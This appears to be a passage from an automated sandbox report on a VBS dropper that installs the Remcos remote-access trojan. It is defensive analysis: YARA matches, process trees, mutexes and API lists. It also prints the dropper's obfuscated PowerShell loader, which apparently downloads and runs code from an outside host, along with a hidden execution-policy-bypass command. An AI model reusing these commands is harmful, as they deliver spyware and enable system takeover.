[char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + 
'' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [ch
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD345A16C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD345B8EE1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD345B702D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD34680B09
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD345BA8EC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD345B85AB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD345B8E05
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD345B6F5C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD345B6F15
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD345BABD3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD345B5BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD345AADD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD345A8E05
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD345ABA8C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FFD34681493
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00007FFD345B3CD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_0043706A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_00414005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_0043E11C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_004541D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_004381E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_0041F18B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_00446270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_0043E34B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_004533AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_0042742E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_00437566
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_0043E5A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_004387F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_0043797E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_004339D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_0044DA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_00427AD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_0041DBF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_00427C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_00437DB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_00435EEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_0043DEED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_00426E9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00402093 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00401E65 appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00434E70 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00434801 appears 41 times
Source: SKMBT_77122012816310TD0128_17311_XLS.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 29626
Source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 1600, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6764, type: MEMORYSTR Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 6764, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine    Classification label: mal100.rans.spre.troj.spyw.expl.evad.winVBS@37/31@4/5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe    Code function: 20_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,    20_2_0041798D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe    Code function: 20_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,    20_2_0040F4AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe    Code function: 20_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,    20_2_0041B539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe    Code function: 20_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,    20_2_0041AADB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    File created: C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Mutant created: NULL
Source: C:\Windows\System32\conhost.exe    Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe    Mutant created: \Sessions\1\BaseNamedObjects\Rmc-52K54M
Source: C:\Windows\System32\conhost.exe    Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
Source: C:\Windows\System32\conhost.exe    Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_03
Source: C:\Windows\System32\conhost.exe    Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2348:120:WilError_03
Source: C:\Windows\System32\conhost.exe    Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2016:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vjtezlof.q34.ps1
Source: unknown    Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs"
Source: C:\Windows\System32\wscript.exe    File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe    Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SKMBT_77122012816310TD0128_17311_XLS.vbs    Virustotal: Detection: 9%
Source: unknown    Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs"
Source: C:\Windows\System32\wscript.exe    Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [ch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
